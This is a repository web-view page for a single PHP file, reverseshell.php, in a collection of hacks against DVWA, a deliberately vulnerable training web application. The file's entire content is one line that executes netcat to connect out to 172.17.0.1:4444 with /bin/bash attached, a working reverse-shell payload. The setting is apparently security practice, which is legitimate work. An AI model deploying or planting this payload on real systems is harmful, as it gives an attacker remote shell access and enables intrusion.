index
:
cybersecurite/dvwa.git
master
Hacks pour Dvwa (Damn Vulnerable Web Application)
git
summary
refs
log
tree
commit
diff
log msg
author
committer
range
path:
root
/
reverseshell.php
blob: 754c35d00425c5233411237aebec195fb0c6cda1 (
plain
)
1
2
3
<?php exec("nc 172.17.0.1 4444 -e /bin/bash >/dev/null &"); ?>